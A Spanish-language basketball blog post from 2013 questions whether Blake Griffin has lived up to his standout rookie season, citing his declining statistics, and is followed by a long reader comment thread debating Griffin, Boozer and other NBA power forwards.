Ser o no ser: Blake Griffin

20 de October de 2013 por Esteban

Blake GriffinBlake Griffin causó auténtico furor en su primera temporada en la NBA. Muchos veían en él al futuro Malone, incluso alguno apostaba porque lo superaría. Ya han pasado dos años de aquella temporada rookie y podemos preguntarnos si Griffin va camino de ser el próximo Malone o no.

Este ala-pívot se perdió su temporada de novato tras ser elegido con el  número uno por los Clippers. ¿Mal augurio? Muchos dejaron caer los nombres de Danny Manning y Michael Olowakandi. El maleficio de los Clippers parecía extenderse y absorber a un jugador muy físico. Había muchas dudas sobre su nivel una vez volviera de una lesión que lo mantendría apartado mucho tiempo.

Pero el maleficio se rompió. Después de un año en blanco absoluto, debutó en la NBA el 27 de Octubre de 2010 y completó una temporada rookie para el recuerdo. Fue la sensación del año en la NBA gracias a muchas volcadas sorprendentes (¿o no, Mozgov?). Fue seleccionado para el All-Star de los novatos y para el de los mayores y ganó el concurso de volcadas saltando sobre un auto. A pesar de haber sufrido una grave lesión de rodilla y haber pasado un año en blanco jugó los 82 partidos de la temporada y dejó actuaciones memorables como los 47 puntos frente a los Pacers de enero de 2011. Unánimemente fue seleccionado rookie del año en la NBA, con números que no se veían desde O’Neal o Duncan: 22’5 puntos, 12’1 rebotes y 3’8 asistencias. 

La opinión generalizada era que estábamos en presencia del futuro dominador de la NBA y tanto se convencieron los Clippers que cortaron su eterno proceso de reconstrucción en febrero de 2011 enviando su primera ronda de aquel año  (que acabaría convirtiéndose en Kyrie Irving) a los Cavs a cambio de Mo Williams para empezar a competir desde ese mismo momento. En la temporada del lockout dieron el salto definitivo: Gracias a un guiño del destino se hicieron con el mejor base de la competición, Chris Paul, y sumaron también a Caron Butler y Chauncey Billups para la causa. Los Clippers habían formado un equipazo con un solo objetivo: el anillo.

Los expertos decían que la llegada de Paul a los Clippers transformaba a Blake Griffin en serio candidato al MVP de la temporada regular pues auguraban que formarían una dupla tan o más letal que la formaban Nash y Amare en los buenos tiempos. Entre aquel día y el de hoy han pasado dos temporadas y dos playoffs y creo que podemos concluir que la supuesta evolución de Griffin hacia el nuevo Malone y su teórica candidatura al MVP de la regular han sido solo un espejismo que se va diluyendo año tras año.

Griffin ha experimentado una merma notable en sus números temporada tras temporada: en su año rookie fueron de 22’5 puntos y 12’1 rebotes, en la 2011/12, 20.7 puntos y 10.9 rebotes y en la 2012/13 sus números han caído hasta los 18.0 puntos y 8.3 rebotes. En playoffs sus números han sido siempre inferiores a los de la regular y también han caído: en la 2011/12 promedió 19.1 puntos y 6.9 rebotes y en la 2012/13, 13.2 puntos y 5.5. rebotes.

Podrán excusarse sus defensores en una merma de minutos, de lanzamientos o en alguna que otra lesión pero lo cierto es que sus números por cada 36 minutos también han disminuido:

  • 2010/11: 21.3 puntos, 11.4 rebotes y 3.6 asistencias
  • 2011/12: 20.6 puntos, 10.8 rebotes y 3.2 asistencias
  • 2012/13: 20.0 puntos, 9.2 rebotes y 4.1. asistencias

Griffin ha disputado cada vez menos minutos por partido pero su producción no solo no ha aumentado sinó que ha bajado.

Otros dirán que es un gesto de grandeza y ganador, resignar tiros y estadísticas en un equipo ganador pero Griffin tampoco parece andar por esos lares ya que no ha aumentado sus porcentajes de tiro al mismo nivel que han disminuido sus prestaciones. Tampoco se le ve tan atlético como hace un par de años tras esa lesión con el Team USA. De hecho, este año no nos ha dejado ningún póster para recordar.

Pero más allá de los números fríos, me baso en el juego de Blake Griffin para desconfiar de su consideración de mega estrella y sobretodo de su capacidad para ser el ladero de CP3 camino a un campeonato.

Cuatro años después de salir de la universidad, no ha desarrollado movimientos confiables cerca del aro más allá de las jugadas extravagantes en el aire marca de la casa. Vive en su mayoría de alley-oops, contragolpes o pases donde sólo debe recibir y machacar.  No tiene juego de poste, de hecho nunca postea sinó que se da vuelta y juega de frente al canasto tratando de superar al rival gracias a su velocidad, y no le he visto en 3 años hacer un up and under de forma consistente. Sus porcentajes de tiros libres son muy pobres (61%), no ha logrado ganar un tiro de media distancia mínimamente confiable y ni hablar de tirar de más allá de la línea de tres puntos.

¿Cuál fue el último partido dominante de Griffin que recuerdan? Ha tenido buenos juegos y ha sido útil para su equipo, como cuando eliminaron a Memphis en 2012, pero tan solo como complemento. Cada vez le cuesta más llegar a la barrera de los 30 puntos y difícilmente se le ve anotando en los últimos minutos de un partido reñido.

Un detalle en el que no nos detuvimos en su momento fue en la edad de Griffin en su año rookie lo que podría explicar algunas cosas. Blake jugó un año en la universidad y después se pasó todo un año recuperándose de una lesión. Por ejemplo, Lebron James, quien no pasó por la NCAA, a la edad en que Griffin jugó su temporada rookie, jugaba su tercer año en la NBA y promediaba en la temporada regular 31’4 puntos por juego. En los playoffs se fue a los 30.8 y llevó a los Cavs a la segunda ronda. Barkley dijo en su momento que Griffin no podía ser considerado un rookie dado que ya había estado toda una temporada en un equipo NBA pero no le hicimos caso y perseguimos la fantasía de estar frente a una leyenda.

En este tiempo, los Clippers no han disfrutado de una mejora en Griffin. Él no ha resignado protagonismo para ganar partidos. Lo ha perdido por simple falta de recursos para mantenerlo. No es un “no quiero” sino un “no puedo”.

Yo particularmente no veo Blake Griffin capaz de ser la segunda espada de un equipo campeón de la NBA. ¿Y ustedes?

Comenta

41 comentarios a esta entrada

  1. Vader dice:
    #1

    Yo creo que la comparación más acertada es con Stoudemire. Con tres diferencias, Stat es más alto, tira mejor de media distancia y desde el tiro libre… A favor de Griffin quizás sólo diria que es más intenso. Así que…

    Lo que deberían hacer los Clippers para aprovechar que tienen a CP3 es traspasarlo a cambio de LaMarcus Aldridge por ejemplo.

    Saludos

      Citar

  2. franitis dice:
    #2

    Totalmente de acuerdo con el artículo; siempre me ha parecido un jugador sobrevalorado por su espectacularidad (y obviamente por su gran temporada “sophorookiemore”), pero como muy bien ha analizado Esteban, no hay progresión alguna en su juego, si no al contrario, una involución… ¿Quién lo ha comparado con “El cartero”? Es que no tiene ni punto de comparación la repercusión de Malone en Utah con lo que este tío aporta a LAC…

    El cambio que dice Vader sería un auténtico “blockbuster” que daría un salto de calidad a la plantilla de LAC, pero ya puestos un Cousins, ¿no o qué? 😉

      Citar

  3. Denise dice:
    #3

    Este año creo que es bastante crucial para él, si no mejora esta temporada, podriamos decir que su margen de mejora ya se acaba. En marzo cumplirá los 25 años, y puede que se quede en una eterna promesa.
    De todas formas, mientras el fisico le aguante, podrá rondar los 18-20 puntos y los 9-10 rebotes a base de mates y algun que otro gancho casual, pero es verdad que no tiene apenas movimientos ofensivos de calidad, su juego de pies es pobre, su tiro de media distancia es nulo y encima no puede jugar los ultimos minutos de los partidos apretados porque lo mandan al tiro libre y rompe el tablero a pedradas.
    Si no mejora, cuando tenga 30 y ese fisico portentoso le haya dicho adios, Griffin pasará a ser un Kris Humphries de la vida. Es lo que hay, a veces los highlights tapan la perspectiva de lo que es un jugador durante los 48 minutos, y Griffin será muy popular por sus mates y venderá mucho merchandising pero en mi opinión hay como una decena de power-forwards mejores que él (Pau, Aldridge, Duncan, David Lee, Bosh, Randolph, David West, Greg Monroe, Kewin Garnett, Carlos Boozer y a lo mejor se me está olvidando alguno)

    Con Ibaka me pasa lo mismo que con Griffin, obviamente no son ni mucho menos malos jugadores, pero deberian dejar de basarlo todo en el fisico y centrarse en mejorar sus movimientos y anotar por calidad.

      Citar

  4. Luis H. dice:
    #4

    Pues acabo de ver el vídeo de los 47 pts a Indiana y tela. Movimientos de pies, tiros de media distancia -al cristal o directos al aro-, fintas, etc. Lo de los tiros libres creo que lo sabe, pero igual no le han presionado ahí como deben. Este año, el equipo depende más de él y de Jordan, porque los exteriores no son malos, pero creo que peores que el año pasado. Hay que empezar a dar la talla. Debería estar por lo menos en 25 pts y 12 rebotes por partido

      Citar

  5. Gastón dice:
    #5

    Buen articulo, coincido en todo lo que comentas. Yo flipe el primer año con Blake…Si empezaba asi, como serian sus siguientes años? Pues la logica me dice que serian geniales, evolucionando, ampliando repertorio, movimientos e IQ.

    Pero no ha sido asi, no lo considero un pufo, pero no es para tanto. La NBA nos vende mucho a Blake, por que como bien dice Denise, asi se compran mas camisetas de ese ” super jugador”.

    Los jugadores exclusivamente atleticos me aburren. Le dare un voto de confianza hasta el All-Star, sino mejora: marketing player.

      Citar

  6. TheDeerHunter dice:
    #6

    Pues yo no es que no esté de acuerdo con todo lo que estáis diciendo… es que estoy radicalmente en desacuerdo.

    Hablemos de datos. Con 24 años fue elegido para el segundo quinteto ideal de la liga por segundo año consecutivo. Creo que está plenamente consolidado como uno de los 10-15 mejores jugadores de la liga. Así que no se me ocurre dónde no podría jugar Griffin de primera, segunda… o la espada que a él le salga de las narices.

    ¿Exclusivamente atlético? Es uno de los mejores hombres altos pasadores de toda la liga. Está en pleno desarrollo, porque es engañoso hablar de una caída de 22 puntos a 18, cuando ahora absorbe 3 lanzamientos menos y regula su presencia en 6 minutos menos (todo comparado con el primer año) La caída de rebotes quizá sería el dato a vigilar más, pero también puede estar intoxicado por el ritmo de juego que imponga su equipo, por ejemplo. Para mí es evidente que su juego es cada día más eficaz y concreto.
    Opino que con una mejora defensiva y reboteadora… simplemente subir un escalón, y ser aún más consistente en los tiros libres (algo en lo que también se observa mejora) podría entrar en la carrera de MVP. Creo que lo van a ver nuestros ojos muy pronto.

    Sólo añadir que en la ESPN proyectan su WARP de este año (http://www.sonicscentral.com/warp.html) como el 15º de toda la liga (casi empatado con el 10º que es Marc) y es el 2º entre todos los PF únicamente por detrás de LeBron.

    Cito: “Although it might not be as fast as his critics want, Griffin’s game is developing. He has improved his post-up game, adding an occasional Dirk Nowitzki-esque fadeaway, and ranked fifth in the NBA in post scoring, per Synergy Sports. Griffin is especially dangerous as a low-post passer, having improved his assist rate dramatically last season. Pau Gasol was the only full-time big man who handed out assists more frequently.” Kelvin Pelton.

      Citar

  7. R1Molano dice:
    #7

    [img]http://minustwentytwo.com/wp-content/uploads/2013/01/warriors-bench-blake-griffin-shot.gif[/img]

      Citar

  8. Viva_Dirk dice:
    #8

    Estoy con Deer, para mi Griffin ha ido concretando su juego y alejandose de la versión de jugador espectáculo que se creo de forma inevitable.

    Que no juegue al poste no me parece extraño, es mas pequeño que muchos de sus rivales y sus virtudes son otras. Un tiro de media distancia si es mucho mas necesario para su juego, igual que una mejora en defensa.

      Citar

  9. r_miller dice:
    #9

    Yo creo que es un buen jugador pero con su fisico deberia cojer 13 o 14 rebotes por partido, con su salto poco pivots pueden quitarle un balon, sobretodo porque muchos ala-pivots, zach randolf, pau gasol ,aldridge no saltan demasiado, pero su problema esque en vez de buscar el rebote corre al contraataque lo que no es malo, pero ayudaria mas cojiendo él el rebote y no tener siempre que acabar el contraataque él. Tambien es raro que hiciera mas puntos sin Paul que con Paul, porque se suponia que gracias a él debía encontrar mas facilmente los espacios, pero no ha sido asi y otra cosa, ¡porque se obsesionan los buenos equipos en tener 10 jugadores validos! i no dejarles jugar todo lo que deben en vez de tener 7 jugando mas de 20 minutos y entre estos, tres o cuatro mas de 30. Creo que es el problema que ha tenido Denver y por eso se han ido Brewer y Iguodala porque jugar 20 minutos no es divertido por mucho equipazo que tengas.

      Citar

  10. Denise dice:
    #10

    TheDeerHunter:
    Pues yo no es que no esté de acuerdo con todo lo que estáis diciendo… es que estoy radicalmente en desacuerdo.

    Hablemos de datos. Con 24 años fue elegido para el segundo quinteto ideal de la liga por segundo año consecutivo. Creo que está plenamente consolidado como uno de los 10-15 mejores jugadores de la liga. Así que no se me ocurre dónde no podría jugar Griffin de primera, segunda… o la espada que a él le salga de las narices.

    ¿Exclusivamente atlético? Es uno de los mejores hombres altos pasadores de toda la liga. Está en pleno desarrollo, porque es engañoso hablar de una caída de 22 puntos a 18, cuando ahora absorbe 3 lanzamientos menos y regula su presencia en 6 minutos menos (todo comparado con el primer año) La caída de rebotes quizá sería el dato a vigilar más, pero también puede estar intoxicado por el ritmo de juego que imponga su equipo, por ejemplo. Para mí es evidente que su juego es cada día más eficaz y concreto.
    Opino que con una mejora defensiva y reboteadora… simplemente subir un escalón, y ser aún más consistente en los tiros libres (algo en lo que también se observa mejora) podría entrar en la carrera de MVP. Creo que lo van a ver nuestros ojos muy pronto.

    Sólo añadir que en la ESPN proyectan su WARP de este año (http://www.sonicscentral.com/warp.html) como el 15º de toda la liga (casi empatado con el 10º que es Marc) y es el 2º entre todos los PF únicamente por detrás de LeBron.

    Bueno Deer, consolidado está pero ya sabes como funciona este tinglado. Los que van a los All-Stars y los que salen en highlights no siempre son los mejores. Obviamente para la imagen de la NBA, será mejor un Blake Griffin que un Carlos Boozer. Y para nada lo veo en un top 15 de mejores jugadores de la liga. De hecho, solo de ala-pivots ya me salen más de 12 mejores que él como nombré en un comentario anterior (y se me han olvidado Nowitzki y Kevin Love)

    El Warp este dirá lo que quiera, pero tu al Griffin de los ultimos 2 años no le puedes dar un balón en un momento apretado para que te consiga una canasta por calidad. Su aportación en los minutos calientes debe ser terrible. Y gracias a que juega al lado del mejor base de la liga, si jugase con una castaña de base que no le diese buenas asistencias, en los ultimos años no habría llegado a los 14 puntos de media.

    Que puede mejorar, por supuesto. Qué los Clippers pueden ganar un anillo, por supuesto. Pero al Blake Griffin actual lo metería en un Top 50 de la liga, y gracias.

      Citar

  11. Pop dice:
    #11

    Hombre, veo aquí un poco 2 extremos. Ni luchar por el MVP ni fuera de los 15 mejores PF de la liga, por dios. Desde luego que no es Karl Malone, vaya unas varas de medir que elegimos. Con esas comparaciones ya me diréis quién se libra.

    Griffin no es precisamente santo de mi devoción, pero aquí la pregunta planteada es si puede ser segunda espada de un aspirante. Y, carencias aparte, entiendo que un tío de 20pts-10reb-4asist es una segunda espada cojonuda. Otra cosa es que su nivel esté por debajo de lo que se vende de él, o que no sea una megaestrella, por lo menos ahora. Veremos en el futuro, que yo no lo creo, pero que tiene 25 años, no 32.

      Citar

  12. Esteban dice:
    #12

    Pop:
    Hombre, veo aquí un poco 2 extremos. Ni luchar por el MVP ni fuera de los 15 mejores PF de la liga, por dios. Desde luego que no es Karl Malone, vaya unas varas de medir que elegimos. Con esas comparaciones ya me diréis quién se libra.

    Griffin no es precisamente santo de mi devoción, pero aquí la pregunta planteada es si puede ser segunda espada de un aspirante. Y, carencias aparte, entiendo que un tío de 20pts-10reb-4asist es una segunda espada cojonuda. Otra cosa es que su nivel esté por debajo de lo que se vende de él, o que no sea una megaestrella, por lo menos ahora. Veremos en el futuro, que yo no lo creo, pero que tiene 25 años, no 32.

    en PO no ha promediado 20-10

    donde pueden verse los promedios de griffin en los ultimos 5 minutos de los juegos?

      Citar

  13. txusma dice:
    #13

    Pues por ejemplo, aquí:

    http://www.82games.com/1213/CSORT11.HTM

    Blake Griffin no es de los que más anota pero es que en su equipo tiene un jugador que asume totalmente esta responsabilidad. Lo peor: ese 57% en tiros libres.

      Citar

  14. GreenPride dice:
    #14

    Griffin, para mí una de las decepciones de los últimos años. Tras su gran año rookie prácticamente todos esperábamos que con una mejora de su lanzamiento estaría preparado para dominar la NBA. No sólo no ha sido así sino que aunque ha mejorado algunas cosas levemente su importancia ha ido decayendo. Desde luego yo no le daría balones en situaciones comprometidas y se ha podido ver cómo su juego no es decisivo. Quizás el hecho de tener a CP3 al lado le ha perjudicado casi más que beneficiado como muchos suponían cuando Paul llegó a Los Angeles. El hecho de que un jugador que debería estar en el momento álgido de su carrera, juegue menos minutos y haga menos tiros que antes tampoco es que hable demasiado en su favor. ¿Veis a Jordan, Bird, LeBron, Karl Malone, Barkley y demás haciendo eso en el mejor momento de sus carreras?
    Sinceramente creo que Griffin debe mejorar y ser más decisivo en su equipo para llegar a acercarse a las expectativas que se crearon sobre él en su primer año

      Citar

  15. rumbero dice:
    #15

    Esteban:
    donde pueden verse los promedios de griffin en los ultimos 5 minutos de los juegos?

    Esa estadística con Paul en el equipo es tremendamente engañosa.

    Yo firmo palabra por palabra lo que dice Pop. Ni tanto ni tan poco, que a veces nos liamos con comparativas que no son reales por culpa del hype de salir cada día en los highlights y de su primera temporada. A mi sin convencerme me parece una segunda espada válida aunque espero más de él. Otro tema es valorar su contrato de 95 millones si realmente es un 2ª espada…

      Citar

  16. HisRoyalAirness dice:
    #16

    Porque no me apetece entrar mucho en la discusión (ya adelanto que para mí Griffin es sobrevalorado pero porque no se ha preocupado de ir avanzando) pero… habéis mirado los mismos porcentajes en tiros libros de The Postman? Es que a lo mejor alguno se llevaba una sorpresa. Aún comentaba hace poco Isaiah Thomas que ese había sido el lastre de los Jazz.
    Y es que, por los motivos que fuese, cero anillos

      Citar

  17. franitis dice:
    #17

    0 anillos con tres finales de la NBA a sus espaldas, dos de ellas contra los mejores Chicago Bulls de la historia y la otra en su último año como profesional… Que estamos hablando de un MVP de la liga en dos temporadas, seis finales de conferencia y tres finales de la NBA. Denominarlo “lastre” me suena a rajada de Isaiah… Griffin aún no ha alcanzado ese nivel y por el camino que va no parece que vaya a alcanzarlo. De ahí que chirríen las comparaciones.

      Citar

  18. Viva_Dirk dice:
    #18

    Mejor no mirar los PF que considera Denise mejores que Griffin. Claro veo el nombre de Boozer al lado y que quieres que te diga, ese si ha sido un perdedor consumado siempre.

      Citar

  19. Txusma dice:
    #19

    Viva_Dirk:
    Mejor no mirar los PF que considera Denise mejores que Griffin. Claro veo el nombre de Boozer al lado y que quieres que te diga, ese si ha sido un perdedor consumado siempre.

    Me recuerda a otras listas famosas como la de “1000 jugadores de la historia mejores que Iverson”… 😀

      Citar

  20. Esteban dice:
    #20

    Viva_Dirk:
    Mejor no mirar los PF que considera Denise mejores que Griffin. Claro veo el nombre de Boozer al lado y que quieres que te diga, ese si ha sido un perdedor consumado siempre.

    aunque parezca una idiotez, si me das a elegir entre boozer y griffin me quedo con boozer

    calros tendra un techo mas bajo, pero hay cosas que sabe hacer y muy buen, como su tiro a distancia, el cual a pesar de las lesiones sigue haciendolo y muy bie, no vive de su fisico, salta poco pero aun asi rebotea, no es rapido ni necesita serlo

    para ser claros, es un jugador de 1 a 10, 6 puntos, pero siempre sera asi, se lesione o no, siempre volvera y sera un hombre de 6 puntos

    girffin depende mucho de su fisico, cuando se haga viejo o tenga una lesion dura no volvera a ser el mismo, (recurdense los ultimos años de kemp y eso que ni era tan viejo), si pierde explosividad que le queda? no tiene tiro ni movimiento, ni defiende bien y no rebotea por posicion sino por salto
    es un jugador de 7 puntos ahora si, pero en un abrir y cerrar de ojos se puede convertir en uno de 2 o 3

    jugadores que viven tanto de su fisico, no tienen carreras largas y prosperas en la nba (sin ir mas lejos, ver amare studamire y eso que tiene un mejor mejor tiro que griffin)

      Citar

  21. Denise dice:
    #21

    Viva_Dirk:
    Mejor no mirar los PF que considera Denise mejores que Griffin. Claro veo el nombre de Boozer al lado y que quieres que te diga, ese si ha sido un perdedor consumado siempre.

    Boozer se come a Griffin (menos el de sus año rookie) con patatas, guarnicion y todo lo que quieras, tanto en defensa como en ataque.
    Con mi lista de mejores PF’s que Griffin, quien no esté de acuerdo que lo argumente, yo me reafirmo todas las veces que quieras.
    A dia de hoy, todos estos PF’s son mejores que Blake Griffin:
    (no van en orden)
    1- Aldridge
    2- Pau
    3- Boozer
    4- Nowitzki
    5- Garnett
    6- David Lee
    7- Zach Randolph
    8- Kevin Love
    9- Tim Duncan
    10- Greg Monroe
    11- Chris Bosh
    12- David West (este estaría a su nivel)

      Citar

  22. rumbero dice:
    #22

    Pero pero…que os pasa hoy con Boozer? No me hagáis buscar que seguro que encuentro rajadas sobre este buen hombre 😀 Boozer en ataque es un tio que sabe hacer un par de cosas muy muy bien (especialmente postear) pero si nos quejamos de la defensa de Griffin la de Carlos es un jodido coladero igual. Y luego está esa tendencia a desaparecer y tomar decisiones equivocadas cuando los partidos se ponen calentitos.

    Manda narices que tenga que salir yo a defender a Griffin, pero sólo un par de cosas:
    1 – No me vale lo de “depende del físico” Esteban. Siempre parece que tenga que ser algo malo. Lebron también depende mucho de su físico y no le va mal. ¿Y por que en el caso de lesionarse gravemente no iba a volver a ser el mismo? Este tio estuvo un año parado por la rótula y hablamos maravillas de su temporada rookie. Rose es un base bastante físico y parece que ha vuelto bastante explosivo también. Cada caso es un mundo. Stoudemaire tiene de siempre unas rodillas de cristal y lo que acabó con Kemp fueron los desayunos a base de JB y polvito blanco. Luego tienes tios como Malone o Wilkins que con casi 40 tacos lo seguían haciendo bien.

    2- Me ha dado por jugar con basketball reference. Buscando F/PF que la temporada pasada pasaran de 15 puntos, 5 rebotes tirando por encima de 0.45 FG. Jugando un poco con las columnas no queda mal parado el amigo Blake (las estadísticas no lo son todo ya lo sé, pero para poder hacer un poco de comparativa)
    http://goo.gl/nSZsRZ

      Citar

  23. HisRoyalAirness dice:
    #23

    Lo del lastre era por los tiros libres en el clutch time eh? No que lo fuese como jugador.

    Y dejad de hablar de Boozer, por favor. Jugador “válido”? De acuerdo, pero tiene contrato de All-Star y me da la risa

      Citar

  24. Esteban dice:
    #24

    la discusion de desvirtua

    creo que nadie cuestiona a griffin como jugador nba valido, como titular e incluso para algfuna aparicion en el all star

    lo que se cuestiona es si realmente tiene el nivel que la prensa le ha querido dar de el, y como lo han valorado como compañero al titulo de paul

    yo en este ultimo caso lo veo muy sobrevalorado, como ala pivote titular del all-star del oeste, este año me pareceria ridiculo que este por delante de aldrigh o love, e inluso te digo visto la pretemporada de davies, este estara por delante de el

    la cuestion era esa, dados su numeros de rookie, cubrio las expectativas que creo? sus numeros como se dijo son asimilables a los de o`neal y/o duncan

    por mi parte lo veo muy parecido a vince carter, sobredimensionado por su atletismo y espectaularidad pero a la larga, jugadores menos vistosos terminaran por dejarlo en ridiculo (si pienso en pierce)

      Citar

  25. Denise dice:
    #25

    rumbero:

    2- Me ha dado por jugar con basketball reference. Buscando F/PF que la temporada pasada pasaran de 15 puntos, 5 rebotes tirando por encima de 0.45 FG. Jugando un poco con las columnas no queda mal parado el amigo Blake (las estadísticas no lo son todo ya lo sé, pero para poder hacer un poco de comparativa)
    http://goo.gl/nSZsRZ

    Si, y en esa tabla hay gente como Duncan o Dirk por debajo de él y no creo que nadie en su sano juicio diga que Griffin es mejor que ambos. Y lo de los porcentajes, normal, casi todo lo que mete es a base de mates. Fuera de la zona no supera el 40% desde ninguna posición, simplemente vergonzoso.
    Mira el Shotcharts de Griffin en NBA.com

      Citar

  26. Denise dice:
    #26

    HisRoyalAirness:
    Lo del lastre era por los tiros libres en el clutch time eh? No que lo fuese como jugador.

    Y dejad de hablar de Boozer, por favor. Jugador “válido”? De acuerdo, pero tiene contrato de All-Star y me da la risa

    Pero chico…hablas de Boozer como si fuese un Shelden Williams de la vida.
    El contrato de Boozer teniendo en cuenta la cantidad de morralla sobrevalorada que hay es justo. Ten en cuenta que cuando se lo firman, viene de hacer un 19’5 puntos, mas de 11 rebotes y 3 asistencias con un 56% en tiros de campo.
    Y ojo, sus estadisticas globales NBA en 11 temporadas son de 17 puntos y 10 rebotes con un 53% en tiros de campo y un 72% en libres,. No mucha gente mantiene esas cifras durante mas de una decada.

    Que conste que Griffin creo que va a mejorar con Doc Rivers de entrenador, pero de momento lo que me da risa es que lo vendais como el mejor ó uno de los 3 mejores ala-pivots de la actualidad.

      Citar

  27. HisRoyalAirness dice:
    #27

    Denise: Pero chico…hablas de Boozer como si fuese un Shelden Williams de la vida.
    El contrato de Boozer teniendo en cuenta la cantidad de morralla sobrevalorada que hay esjusto. Ten en cuenta que cuando se lo firman, viene de hacer un 19’5 puntos, mas de 11 rebotes y 3 asistencias con un 56% en tiros de campo.
    Y ojo, sus estadisticas globales NBA en 11 temporadas son de 17 puntos y 10 rebotes con un 53% en tiros de campo y un 72% en libres,. No mucha gente mantiene esas cifras durante mas de una decada.

    Que conste que Griffin creo que va a mejorar con Doc Rivers de entrenador, pero de momento lo que me da risa es que lo vendais como el mejor ó uno de los 3 mejores ala-pivots de la actualidad.

    Denise pero es que Boozer es el claro ejemplo NBA de un “hacenúmeros”. No es un tipo determinante en ningún aspecto, de hecho lo contrataron como supuesto segundo espada de Rose y le han comido el terreno tipos como Noah o Deng que, eleccion AllStar e intensidad aparte, son dos tipos limitadísimos.

    Para mí Boozer es un Amar’e 1.0, aunque con algo más de actitud (que tampoco es muy difícil). My opinion

      Citar

  28. Melo15 dice:
    #28

    En mi opinion os estais excediendo un poco todos.
    Boozer es un ala-pivot muy valido. Muy buen notador y reboteador y su contrato no me parece tan excesivo comparado con algunos que circulan por esta liga.
    A Stat siempre le habeis tenido mucha mania, y aunque es cierto que le falta actitud para ser un estrella es un jugador que de no ser por las lesiones seguiria siendo all-star.
    Y sobre Griffin, yo creo que ahora mismo es un TOP-25 en esta liga pero que le falta un mejora amplia en muchos aspectos si quiere convertirse en un jugador franquicia: tiro de media distancia, defensa y rebote.
    Los demas as

      Citar

  29. Melo15 dice:
    #29

    En mi opinion os estais excediendo un poco todos.
    Boozer es un ala-pivot muy valido. Muy buen notador y reboteador y su contrato no me parece tan excesivo comparado con algunos que circulan por esta liga.
    A Stat siempre le habeis tenido mucha mania, y aunque es cierto que le falta actitud para ser un estrella es un jugador que de no ser por las lesiones seguiria siendo all-star.
    Y sobre Griffin, yo creo que ahora mismo es un TOP-25 en esta liga pero que le falta un mejora amplia en muchos aspectos si quiere convertirse en un jugador franquicia: tiro de media distancia, defensa y rebote.
    Los demas aspectos (juego en el poste, tiros libres…) son en mi opinion secundarios.

    PD: No me vengais con que Stat le debe todos sus all-stars a Nash porque se marco jn temporadon con New York con un base de nu el medio como felton.

      Citar

  30. Viva_Dirk dice:
    #30

    Hombre Boozer donde ha ido no ha mejorado el equipo, jamás ha supuesto un salto de calidad para ningun equipo. Griffin si, es mas determinante que Boozer, atrae mas defensas, es mejor pasador y condiciona al rival infinitamente mas que Boozer.

    No voy a argumentar que Griffin sea actualmente mejor que 7 u 8 jugadores de los que pones ahí ya que tu no argumentas porque lo son. Pero ves jugar a Pau los 2 últimos años y no hace falta argumento alguno.

      Citar

  31. Esteban dice:
    #31

    Viva_Dirk:
    Hombre Boozer donde ha ido no ha mejorado el equipo, jamás ha supuesto un salto de calidad para ningun equipo. Griffin si, es mas determinante que Boozer, atrae mas defensas, es mejor pasador y condiciona al rival infinitamente mas que Boozer.

    No voy a argumentar que Griffin sea actualmente mejor que 7 u 8 jugadores de los que pones ahí ya que tu no argumentas porque lo son. Pero ves jugar a Pau los 2 últimos años y no hace falta argumento alguno.

    que boozer no ha mejorado ningun equipo? no te suenan unos tales bulls?

    de 41-41 los bulls pasaron a 62-20
    es cierto que hubo cambio de copach, y mejoras en general de varios jugadores, pero boozer aporto sus 17.5 puntos y 9.6 rebotes para ese equipo

      Citar

  32. HisRoyalAirness dice:
    #32

    Esteban: que boozer no ha mejorado ningun equipo? no te suenan unos tales bulls?

    de 41-41 los bulls pasaron a 62-20
    es cierto que hubo cambio de copach, y mejoras en general de varios jugadores, pero boozer aporto sus 17.5 puntos y 9.6 rebotes para ese equipo

    Esa fue la temporada que Rose fue MVP o me estoy yo volviendo loco? No me digas que el salto de calidad fue por Boozer por favor.

    Y una cosa que a veces se esgrime por aquí como argumento: somos conscientes que la elección de titulares del All-Star es por votación popular y que el área metropolitana de Los Ángeles tiene 18 millones de habitantes? O que Lin fue el tercer guard más votado para ser titular sólo por detrás de Paul y Kobe? De verdad es un status objetivamente tan importante en mercados tan inmensos?

      Citar

  33. Esteban dice:
    #33

    La pregunta debe ser

    Eres general manager de un equipo q va a jugar una serie por las finales de la nba

    Tu dala pivote titular se lesiona y la nba te permite elegir solo un ala pivote para reremplazarlo

    A quien elijes?

    Dirk, pau, bosh, garnett, love, aldrigh, randolph, ibaka, lee, boozer, horford, o giffin?

    En la posicion que elijas a griffin te dara la respuesta

    Por mi parte, dirk, love, horford y aldrigh estan antes q griffin sin dudas, el resto vemos

      Citar

  34. TheDeerHunter dice:
    #34

    Puedes poner la pregunta que quieras, pero sigue sin justificar que ninguno de ellos hiciera una temporada significativamente mejor que Griffin el curso pasado y playoffs mucho menos… que es al final en torno donde gira esta discusión.

    Añado que para mí tiene un punto de oportunista importante, de forma extraña porque vuelvo a insistir que Griffin estuvo en el segundo equipo ideal el curso pasado, supongo que regalado por la mafiosa NBA (cuando nos conviene)… pero es que al final la discusión es si es un segunda espada válido… y lo comparamos todo con primerísimas espadas. Todo se cae por su propio peso.

      Citar

  35. TheDeerHunter dice:
    #35

    Ah… y el salto de calidad ese de los Bulls ¿lo dio Boozer?
    Pero… ¿quémeestáscontando?????

      Citar

  36. HisRoyalAirness dice:
    #36

    TheDeerHunter:
    Ah… y el salto de calidad ese de los Bulls ¿lo dio Boozer?
    Pero… ¿quémeestáscontando?????

    A eso iba yo.

    Y ante esa pregunta elijo a Love por encima de cualquiera

      Citar

  37. Esteban dice:
    #37

    TheDeerHunter:
    Puedes poner la pregunta que quieras, pero sigue sin justificar que ninguno de ellos hiciera una temporada significativamente mejor que Griffin el curso pasado y playoffs mucho menos… que es al final en torno donde gira esta discusión.

    Añado que para mí tiene un punto de oportunista importante, de forma extraña porque vuelvo a insistir que Griffin estuvo en el segundo equipo ideal el curso pasado, supongo que regalado por la mafiosa NBA (cuando nos conviene)… pero es que al final la discusión es si es un segunda espada válido… y lo comparamos todo con primerísimas espadas. Todo se cae por su propio peso.

    igualmente cobra cxomo un primer espada y juega el all-star por sobre dirk, love y aldrigh

    como digo, invento de la prensa

      Citar

  38. Viva_Dirk dice:
    #38

    Love y Dirk jugaron peor que Griffin el año pasado.

      Citar

  39. Pop dice:
    #39

    Yo es que los sueldos no los metería a la hora de valorar el juego de un jugador. Un equipo puede estar muy interesado en tener a un tío que te va a llenar pabellones y te va a vender chorrocientos mil camisetas, por ejemplo.

    En cuanto a lo del All-Star, no sé porqué la gente sigue insistiendo con esto. Ser All-Star hoy día es ganar un concurso de popularidad, básicamente.

    Estoy con Deer.

      Citar

  40. Sancho88 dice:
    #40

